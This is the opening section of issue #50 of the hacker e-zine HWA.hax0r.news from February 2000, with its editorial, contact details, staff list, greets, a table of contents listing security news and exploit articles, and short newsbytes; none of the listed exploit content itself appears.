[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                        <=-[ HWA.hax0r.news ]-=>                        =
==========================================================================
[=HWA 2000=] Number 50 Volume 2 Issue 2 1999                      Feb 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
=                       "ABUSUS NON TOLLIT USUM"                         =
==========================================================================

Editor: Cruciphux (cruciphux@dok.org)

A Hackers Without Attitudes Production.          (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
==========================================================================

This is #50 covering Jan 16th to Feb 13th, 2000
==========================================================================
"Taking a fat cross section of the underground and security scene today
and laying it in your lap for tomorrow."
==========================================================================

How Can I Help ??
~~~~~~~~~~~~~~~~~

I'm looking for staff members to help with putting the zine together if you
want your name in lights (ie: mad propz and credz in here) and have the time
to spare, then here are some of the areas I can use help in:

The Big One:
~~~~~~~~~~~

Text to HTML project: This entails converting all existing texts to HTML and
including, where appropriate, the hyperlinks for urls mentioned in text.

Foreign Correspondents and Translators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I'm also looking for people willing to translate articles from their area
(usually Dutch, German, Norwegian etc) to contribute articles and if possible
translate them into English for us. You will be marked as HWA staff on our
list, please include your email and website info, and bio if you wish to do
so, none of this is required however. Your help is appreciated!

Site Design
~~~~~~~~~~~

I need some design ideas for the website, I've temporarily revamped it but
I'd like to test some new look and feel ideas, if you're a web wizard and
want to try your hand at making us a site, email me, and go for it, be
warned that we may NOT use your design, but don't let that stop you from
trying your hand at it. An online temp/demo site would be helpful.

News Collection:
~~~~~~~~~~~~~~~

There are a LOT of sources and resources, many listed here and others in the
ether, search these or pick a few of these sources to search for stories of
interest and email them to me. Scan for hacked, hacking, cracked, cracking,
defacement, DoS attack, Cyber, cyberwar, etc as an example.

CGI and PERL script programming
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I'd like to make the zine contents searchable by keyword/issue online and
also display the indexes of online copies of the newsletter. If you have any
ideas for this let me know, I could do it myself but if you already have a
project laying around that would do for this then why reinvent the wheel?
Also; data grabbers that will snag the news from sites like HNN and strip the
HTML off and email the raw news data, etc, headline collectors for
security-focus and packetstorm etc are all also good ideas.

There's more of course, if you have something you'd like to contribute let
me know and I'll find something for you to do.

Thanks for listening

cruciphux@dok.org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         @
@   The HWA website is sponsored by CUBESOFT communications I highly      #
#   recommend you consider these people for your web hosting needs,       @
@                                                                         #
#   Web site sponsored by CUBESOFT networks http://www.csoft.net          @
@   check them out for great fast web hosting!                            #
#                                                                         @
@                       http://www.csoft.net/~hwa                         #
#                                                                         @
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember I'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info, it's a labour of love and
will be continued for as long as I feel like it, I'm not motivated by dollars
or the illusion of fame, did you ever notice how the most famous/infamous
hackers are the ones that get caught? there's a lot to be said for remaining
just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                      Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

"If life is a waste of time and time is a waste of life, then let's all get
wasted and have the time of our lives" - kf

Catch us on Internet Relay Chat, Eris Free Net...

/join #HWA.hax0r.news

**************************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed       ***
***                                                                    ***
***  please join to discuss or impart news on the zine and around the  ***
***  scene or just to hang out, we get some interesting visitors you   ***
***  could be one of em.                                               ***
***                                                                    ***
***  Note that the channel isn't there to entertain you its purpose is ***
***  to bring together people interested and involved in the           ***
***  underground to chat about current and recent events etc, do drop  ***
***  in to talk or hangout. Also if you want to promo your site or     ***
***  send in news tips its the place to be, just remember we're not    ***
***  #hack or #chatzone...                                             ***
**************************************************************************

=--------------------------------------------------------------------------=
                       [ INDEX ] HWA.hax0r.news #50
=--------------------------------------------------------------------------=

Key Intros
=--------------------------------------------------------------------------=

00.0 .. LEGAL & COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. THIS IS WHO WE ARE

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should not
be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with an
idea." - Unknown

01.0  .. GREETS
01.1  .. Last minute stuff, rumours, newsbytes
01.2  .. Mailbag
02.0  .. From the Editor
03.0  .. Slash, Croatian cracker, speaks out
04.0  .. The hacker sex chart 2000
05.0  .. Peer finally arrested after over a decade of IRC terrorism
06.0  .. Updated proxies list from IRC4ALL
07.0  .. Rant: Mitnick to go wireless?
08.0  .. Distributed Attacks on the rise. TFN and Trinoo.
09.0  .. Teen charged with hacking, flees to Bulgaria, still gets busted
10.0  .. Major security flaw in Microsoft (Say it ain't so!! haha)
11.0  .. Cerberus Information Security Advisory (CISADV000126)
12.0  .. "How I hacked Packetstorm Security" by Rainforest Puppy
13.0  .. stream.c exploit
14.0  .. Spank, variation of the stream.c DoS
15.0  .. Canadian Security Conference announcement: CanSecWest
16.0  .. Security Portal Review Jan 16th
17.0  .. Security Portal review Jan 24th
18.0  .. Security Portal review Jan 31st
19.0  .. CRYPTOGRAM Jan 15th
20.0  .. POPS.C qpop vulnerability scanner by Duro
21.0  .. Hackunlimited special birthday free-cdrom offer
22.0  .. HACK MY SYSTEM! I DARE YA! (not a contest)
23.0  .. PWA lead member busted by the FBI
24.0  .. Mitnick's Release Statement
24.1  .. More submitted Mitnick articles
25.0  .. Hackers vs Pedophiles, taking on a new approach
26.0  .. SCRAMDISK (Windows) on the fly encryption for your data
27.0  .. HNN: Jan 17: MPAA files more suits over DeCSS
28.0  .. WARftpd Security Alert (Will they EVER fix this software??)
29.0  .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
30.0  .. HNN: Jan 17: Scotland Yard Investigating Cyber Ransom Demands
31.0  .. HNN: Jan 17: Pay Phone Fraud Committed with Drinking Straw
32.0  .. Owning sites that run WebSpeed web db software
33.0  .. Cerberus Information Security Advisory (CISADV000202)
34.0  .. Security Focus Newsletter #26
35.0  .. HNN: Jan 17: NY Student Arrested After Damaging School Computer
36.0  .. HNN: Jan 17: NSA Wants A Secure Linux
37.0  .. HNN: Jan 17: Cryptome may be breaking the law
38.0  .. HNN: Jan 21: H4g1s Member Sentenced to Six Months
39.0  .. HNN: Jan 21: Smurf Attack Felt Across the Country
40.0  .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net
41.0  .. HNN: Jan 21: False Bids Submitted, Hackers Blamed
42.0  .. HNN: Jan 21: UK to create cyber force
43.0  .. HNN: Jan 21: Army Holds Off Cyber Attack
44.0  .. HNN: Jan 24: French smart card expert goes to trial
45.0  .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack
46.0  .. HNN: Jan 24: Viruses Cost the World $12.1 Billion
47.0  .. HNN: Jan 24: L0pht and @Stake Create Controversy ($)
48.0  .. HNN: Jan 24: Several New Ezine Issues Available
49.0  .. HNN: Jan 25: AIM Accounts Susceptible to Theft
50.0  .. HNN: Jan 25: Outpost Leaks Customer Info
51.0  .. HNN: Jan 25: DeCSS Author Raided
52.0  .. HNN: Jan 25: Solaris May Go Free and Open
53.0  .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication
54.0  .. HNN: Jan 25: Japan Needs US Help With Defacements
55.0  .. HNN: Jan 25: Car Radios Monitored by Marketers
56.0  .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers
57.0  .. HNN: Jan 26: Support for DeCSS Author Grows
58.0  .. HNN: Jan 26: China To Require Crypto Registration
59.0  .. HNN: Jan 26: NEC Develops Network Encryption Technology
60.0  .. HNN: Jan 26: UPS announces Worldtalk secure email
61.0  .. HNN: Jan 27: Napster Reveals Users Info
62.0  .. Dissecting the Napster system
63.0  .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse
64.0  .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law
65.0  .. HNN: Jan 27: Data From Probes of Takedown.com
66.0  .. HNN: Jan 27: Top Ten Viruses of 1999
67.0  .. HNN: Jan 27: French Eavesdrop on British GSM Phones
68.0  .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack
69.0  .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!
70.0  .. HNN: Jan 31: MS Issues Security Patch for Windows 2000
71.0  .. HNN: "Have script Will destroy" - a buffer overflow article
72.0  .. HNN: Cert Warning? : what me worry?? - buffer overflow article
73.0  .. HNN: The Japanese Panic Project - buffer overflow article
74.0  .. HNN: Jan 31: Bulgarian Indicted for Cyber Crime
75.0  .. HNN: Jan 31: Online Banking Still Immature
76.0  .. HNN: Jan 31: E-Mail Scanning System In Progress
77.0  .. HNN: Jan 31: USA Today Headlines Changed
78.0  .. HNN: Jan 31: @Stake and L0pht
79.0  .. HNN: Jan 31: Book Review: "Database Nation"
80.0  .. HNN: Feb 1st: Interview with DeCSS Author
81.0  .. HNN: Feb 1st: X.com Denies Security Breach
82.0  .. HNN: Feb 1st: Microsoft Security, An Oxymoron?
83.0  .. HNN: Feb 1st: Cringely, Defcon, E-Commerce and Crypto
84.0  .. HNN: Feb 1st: Cold War Spies For Hire
85.0  .. HNN: Feb 1st: More Ezines Available
86.0  .. HNN: Feb 2nd: WorldWide Protest Against MPAA Planned
87.0  .. HNN: Feb 2nd: DoubleClick Receiving Protests
88.0  .. HNN: Feb 2nd: More CC Numbers Found on Net
89.0  .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire
90.0  .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales
91.0  .. HNN: Feb 2nd: Web Aps, the New Playground
92.0  .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests
93.0  .. HNN: Feb 3rd: Curador Posts More CC Numbers
94.0  .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps
95.0  .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info
96.0  .. HNN: Feb 4th: 27 Months for Piracy
97.0  .. Have you been looking for www.hack.co.za?
98.0  .. HNN: Feb 4th: Security Holes Allow Prices to be Changed
99.0  .. ThE,h4x0r.Br0z toss us a dis
100.0 .. HNN: Feb 4th: Carders Congregate in IRC
101.0 .. HNN: Feb 4th: Tempest Tutorial and Bug Scanning 101
102.0 .. HNN: Feb 7th: Mitnick to Give Live Interview
103.0 .. HNN: Feb 7th: Anti MPAA Leafletting Campaign a Huge Success
104.0 .. HNN: Feb 7th: Founding Member of PWA Busted
105.0 .. HNN: Feb 7th: Teenager Busted for Attempted Cyber Extortion of $500
106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime
107.0 .. HNN: Feb 7th: Philippine President Web Site Defaced
108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law
109.0 .. HNN: Feb 8th: Yahoo Taken Offline After Suspected DoS Attack
110.0 .. HNN: Feb 8th: New Hack City Video
111.0 .. HNN: Feb 8th: Thailand E-commerce Site Stored Credit Cards on
         Mail Server
112.0 .. HNN: Feb 8th: Script Kiddie Training
113.0 .. HNN: Feb 8th: Personal CyberWars
114.0 .. HNN: Feb 8th: Space Rogue Profiled by Forbes
115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's
         Next?
116.0 .. Trinoo Killer Source Code
117.0 .. Mixter's guide to defending against DDoS attacks
118.0 .. HNN: Feb 9th: Court Authorizes Home Computer Search
119.0 .. HNN: Feb 9th: MPAA Makes Deceptive Demands
120.0 .. HNN: Feb 9th: Medical Sites Give Out Info
121.0 .. HNN: Feb 9th: FTC Investigates Amazon Subsidiary on use of
         Customer Info
122.0 .. HNN: Feb 9th: Sys Admins Possibly At Fault in Japanese
         Defacements
123.0 .. HNN: Feb 9th: Anonymity and Tracking of the Malicious Intruder
124.0 .. HNN: Feb 10th: E-Trade, LA Times, Datek, ZD-Net Join List of
         Sites
125.0 .. HNN: Feb 10th: NIPC Releases Detection Tools
126.0 .. HNN: Feb 10th: The Underground Reaction
127.0 .. HNN: Feb 10th: Haiku Worm Now on the Loose
128.0 .. HNN: Feb 11th: Investigations Continue, Reports of more Possible
         Attacks Surface
129.0 .. HNN: Feb 11th: Author of Tool Used in Attacks Speaks
130.0 .. HNN: Feb 11th: NIPC Reissues Alert on DDoS
131.0 .. HNN: Feb 11th: Lawmakers Succumb to Kneejerk Reaction
132.0 .. HNN: Feb 11th: Humor in the Face of Chaos
133.0 .. HNN: Feb 11th: Britain Passes Despotic Laws
134.0 .. HNN: Feb 11th: France Sues US and UK over Echelon
135.0 .. HNN: Feb 11th: Melissa Virus Comes Back
136.0 .. HWA: aKt0r's story by wyzewun
137.0 .. ISN: Jan 16: Hacker gang blackmails firms with stolen files
138.0 .. How to steal 2,500 credit cards
139.0 .. Good IDS article from Security Portal
140.0 .. Win2000 security hole a 'major threat'
141.0 .. New hack attack is greater threat than imagined
142.0 .. NSA gets bitten in the ass too
143.0 .. rzsz package calls home if you don't register the software
144.0 .. Clinton calls Internet Summit on the DDoS threat
145.0 .. ISN: Who gets your trust?
146.0 .. ISN: Hackers demand 10 Million pounds from Visa
147.0 .. ISN: Cybercrime growing harder to prosecute
148.0 .. ISN: Hacking Exposed (Book review) By Brian Martin
149.0 .. ISN: The crime of punishment by Brian Martin
150.0 .. ISN: EDI Security, Control and Audit (Book review) by Brian Martin
151.0 .. ISN: "Remember, some 'hackers' make house calls" ie: burglary
152.0 .. ISN: Japanese Police crack down on hacker attacks
153.0 .. ISN: Behind the scenes at "Hackers Inc."
154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???)
155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke
156.0 .. ISN: Sites cracked with id's and passwords
157.0 .. ISN: Who are these jerks anyway?
158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer
159.0 .. SSHD Buffer overflow exploit (FreeBSD)
160.0 .. Mozilla curiosity
161.0 .. Any user can make hard links in Unix
162.0 .. Crash windows boxes on local net (twinge.c)
163.0 .. SpiderMap 0.1 Released
164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow
165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS
166.0 .. .ASP error shows full source code to caller
167.0 .. Bypassing authentication on Axis 700 Network Scanner
168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS
169.0 .. CERN 3.0A Heap overflow advisory
170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit
171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit
172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1
173.0 .. Fool firewalls into opening ports with PASV
174.0 .. InetServ 3.0 remote DoS exploit
175.0 .. ppp 1.6.14 shows local user the saved PPP password
176.0 .. Another screw up in MS's Java Virtual Machine, breaks security
177.0 .. mySQL password checking routines insecure
178.0 .. Guninski: Outlook and Active Scripting (again, sigh...)
179.0 .. Break a BeOS poorman server remotely with url infusion
180.0 .. Proftpd (<= pre6) linux ppc remote exploit
181.0 .. Insecure defaults in SCO openserver 5.0.5 leaves the doors open
182.0 .. Malformed link in SERVU then a list = instant DoS (crash!)
183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit
184.0 .. Yet another War-ftpd vulnerability (why do ppl use this?)
185.0 .. Z0rk a Zeus Web Server DoS
186.0 .. Following up on the DDOS attacks of the past week (various)
187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit
188.0 .. Bugfest! Win2000 has 63,000 'defects'
189.0 .. Legit Hackers Roam Cyberspace for Security
190.0 .. Deutch controversy raises security questions for Internet users
191.0 .. PC's Vulnerable to Security Breaches, Experts Say
192.0 .. Hacking hazards come with Web scripting territory
193.0 .. Microsoft battles pair of security bugs
194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data
195.0 .. How Safe Is AOL 5.0?
196.0 .. Teens steal thousands of net accounts
197.0 .. Online Credit Hacker May Be Out For Profit

=-------------------------------------------------------------------------=

AD.S   .. Post your site ads or etc here, if you can offer something in
          return that's tres cool, if not we'll consider ur ad anyways so
          send it in. Ads for other zines are ok too btw just mention us in
          yours, please remember to include links and an email contact.
Ha.Ha  .. Humour and puzzles
          Oi! laddie! send in humour for this section! I need a laugh and
          it's hard to find good stuff... ;)
SITE.1 .. Featured site,
H.W    .. Hacked Websites
A.0    .. APPENDICES
          * COMMON TROJAN PORTS LISTING
A.1    .. PHACVW linx and references
A.2    .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3    .. Mirror Sites list
A.4    .. The Hacker's Ethic 90's Style
A.5    .. Sources
A.6    .. Resources
A.7    .. Submission information
A.8    .. Mailing lists information
A.9    .. Whats in a name? why HWA.hax0r.news??
A.10   .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11   .. Underground and (security?) Zines

* Feb 2000 moved opening data to appendices, A.2 through A.10, probably more
  to be added. Quicker to get to the news, and info etc... - Ed

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT
TO READ, QUOTE AND REDISTRIBUTE/MIRROR.

- EoD

** USE NO HOOKS **

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so I'll print any and all news but will quote sources when the source
is known, if it's good enough for CNN it's good enough for me. And I'm doing
it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez
Archive?), and does not condone 'warez' in any shape manner or form, unless
they're good, fresh 0-day and on a fast site.

cruciphux@dok.org

Cruciphux [C*:.]
HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic dog
droppings, or fake vomit thanks.
Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~  are reading this from some interesting places, make my day and get
a mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal and
send a poor guy a postcard preferably one that has some scenery from your
place of residence for my collection, I collect stamps too so you kill two
birds with one stone by being cool and mailing in a postcard, return address
not necessary, just a "hey guys being cool in Bahrain, take it easy" will do
... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:
Cruciphux's ICQ: 58939315  note; not always online, and do not abuse or use
for lame questions!

My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas 99 issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

01.0 Greets!?!?!
yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest, but I'd like to see more reader input. Help me out here: what's good, what sucks, etc. Not that I guarantee I'll take any notice, mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet  Pyra  TwstdPair  _NeM_  D----Y  Dicentra  vexxation  sAs72  Spikeman  p0lix  Vortexia  Wyze1  Pneuma  Raven  Zym0t1c  duro  Repluzer  astral  BHZ  ScrewUp  Qubik  gov-boi  _Jeezus_  Haze_  thedeuce  ytcracker  loophole  BlkOps  vetesgirl  Slash  bob-  CHEVY*  Dragos Ruiu  pr0xy

Folks from #hwa.hax0r.news and other leet secret channels, *grin* - mad props! ... ;-)

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick (free at last)

Kevin is due to be released from federal prison on January 21st 2000; for more information on his story visit http://www.freekevin.com/

kewl sites:

+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW -> ** Due to excessive network attacks this site is now being mirrored at http://www.siliconinc.net/hack/
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..."
- FProphet '99

Since we provide only the links in this section, be prepared for 404's - Ed

+++ When was the last time you backed up your important data?

++ Phony Tragedy Site Has Virus
   Contributed by Slash
   Alaska Airlines warns that a Web site seeking donations for victims of Flight 261 is a phony and that it is carrying a virus.
   Full Story

++ Tough U.S. Bank Privacy Regs
   Contributed by Slash
   U.S. regulators took a tough line Thursday on privacy protection for personal financial information included in a historic overhaul of Depression-era U.S. banking laws.
   Full Story

++ Patch Available for the Recycle Bin Creation Vulnerability
   Contributed by Slash
   Microsoft has released a patch that eliminates a security vulnerability in Windows NT 4.0. This hole allows a malicious user to create, delete or modify files in the Recycle Bin of another user who shared the machine.
   Full Story

++ Behind the Scenes at 'Hackers, Inc.'
   Contributed by Slash
   Professional hackers roam Net to keep companies--and data--secure.
   Full Story

++ The Net's Dark Side: Protecting Your Privacy May Empower Criminals
   Contributed by Slash
   Surfing the Web. You thought you knew how dangerous it could be. But many Americans might be astonished at how easy it is to uncover the most sensitive personal information.
   Full Story

++ RSA Security's Industry-Leading Encryption Technology Offered in OpenSite AuctionNow and OpenSite Dynamic Pricing Toolkit
   Contributed by Slash
   Full Story

++ Essential Security for DSL and Cable Modem Users
   Contributed by Slash
   Zone Labs, Inc., today announced the immediate availability of the new ZoneAlarm 2.0 Internet security utility.
   Full Story

++ F-Secure, Hewlett Packard team up in WAP security
   Contributed by Slash
   Finnish computer security company F-Secure said on Thursday it would develop security for Internet-enabled Wireless Application Protocol (WAP).
   Full Story

++ Experts Warn of Web Surfing Risk
   Contributed by Slash
   Computer experts are warning of a serious new Internet security threat that allows hackers to launch malicious programs on a victim's computer.
   Full Story

++ Teen Hacker's Home Raided (Business Tuesday)
   http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126
   The home of the 16-year-old hacker who launched three major lawsuits was raided Monday in Norway, and the international hacking community is reeling from the news. By Lynn Burke.

++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST)
   http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126
   NSA documents refer to 'Echelon.' Is it the suspected international citizen spying machine or the name of a legal military project? The researcher who found them thinks it's the latter. By Chris Oakes.

++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST)
   http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203
   The three-month-long hostile bid by Britain's telecom giant is finally about to end ... in a friendly takeover.

++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST)
   http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203
   The Linux software distributor pays an estimated $850 million in stocks and cash for the network of tech-info sites, which includes the esteemed Slashdot.

++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m. PST)
   http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203
   The controversy about Internet wiretaps -- which pitted the FBI and the FCC against the ACLU and the EFF -- has ended with a recommendation against online surveillance. Declan McCullagh reports from Washington.

++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST)
   http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203
   BMG Germany pulls the plug on its first effort to protect CDs from piracy after customers complain that some of the music is unplayable. By Chris Oakes.

++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST)
   http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203
